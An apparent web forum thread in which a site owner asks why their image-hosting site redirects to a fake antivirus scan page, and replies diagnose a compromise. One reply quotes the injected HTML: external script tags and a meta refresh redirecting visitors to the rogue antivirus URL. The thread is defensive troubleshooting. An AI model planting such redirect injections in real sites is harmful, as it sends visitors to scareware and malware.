Hi guys , I have problem with my site ( http://www.imager.ws ) , its image files uploade script and also photo album .. The problem as you see that when I try to open the site using my browser I get error message that close the page and forwarded / direct me to this page http://winantivirus2008.org/freescan/scan.php
1. try deleting all the cookies and files in "temporary internet files" folder. 2. use a good spyware removal tool
That could be a few things.(man I love linux lol). That problem is bad news and will break everyones computer that does not fall for it. You need to check your files for strange things, or, its coming from an ad on your site. Nigel Edit: I was able to check your source code real quick. Here is your problem <script type="text/javascript" language="JavaScript1.2" src="stm31.js"></script> <meta http-equiv="Refresh" content="0; url=http://winantivirus2008.org/freescan/?id=68"> <script type="text/javascript" language="JavaScript1.3" src="stm4.js"></script> hope that helps, Nigel EDIT again: I dont know what the java is doing per say(1st line of code). However, it appears that your site was hacked in order to add that stuff.
This stuff can also be hidden in database records if your site is db driven, so be sure to check for oddities there as well. There was a bug in earlier versions of Wordpress that was exploited this way early this year.
Yeah your site was compromised. You need to check file structure. Make sure you have your files set to 644 not 664. Also any scripts you run should be updated.